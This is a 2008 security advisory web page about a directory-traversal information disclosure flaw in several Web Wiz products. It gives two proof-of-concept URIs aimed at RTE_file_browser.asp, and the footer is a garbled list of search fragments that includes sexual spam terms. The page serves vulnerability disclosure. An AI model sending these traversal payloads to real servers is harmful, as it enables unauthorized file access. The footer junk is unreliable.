about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Multiple Web Wiz Products Remote Information Disclosure Vulnerability


Title Multiple Web Wiz Products Remote Information Disclosure Vulnerability
Published 2008-01-23-12:00AM
Updated 2008-01-24-05:38PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  The AmnPardaz Security Research Team is credited with the discovery of this vulnerability.
Vulnerable  Web Wiz Rich Text Editor 4.0
Web Wiz NewPad 1.02
Web Wiz Forums 9.07
Not Vulnerable  
Code  Attackers can exploit this issue via a browser.The following proof-of-concept URIs are available:http://www.example.com/RTE_file_browser.asp?look=&sub=\.....\\\.....\\\.....\\http://www.example.com/RTE_file_browser.asp?look=save&sub=\.....\\\.....\\\.....\\\.....\\\.....\\\
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 22 Nov 2008 22:42:29 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
prodution NES file g t956t Womes s e x mambo Remo ms05-019 www.perky- 200 /compo CMS is Fre Openssl Www siadul gigi News Searc maxportal Re www.trisha /search/ex mambamovie worlidsex news for c mambamovie long video www.xvidoe rh348 mambamovie www. usa s NIP SLIP red hat re php 4.4.2 myanmarsex t521t news for C t421t remote adm /search/ex vikinggame sekx Www.xnx.co www.sexyba WWW.FREEPO safe mode http://www sekx Akssexy php 5.2.0 t579t t421t Akssexy shakilasex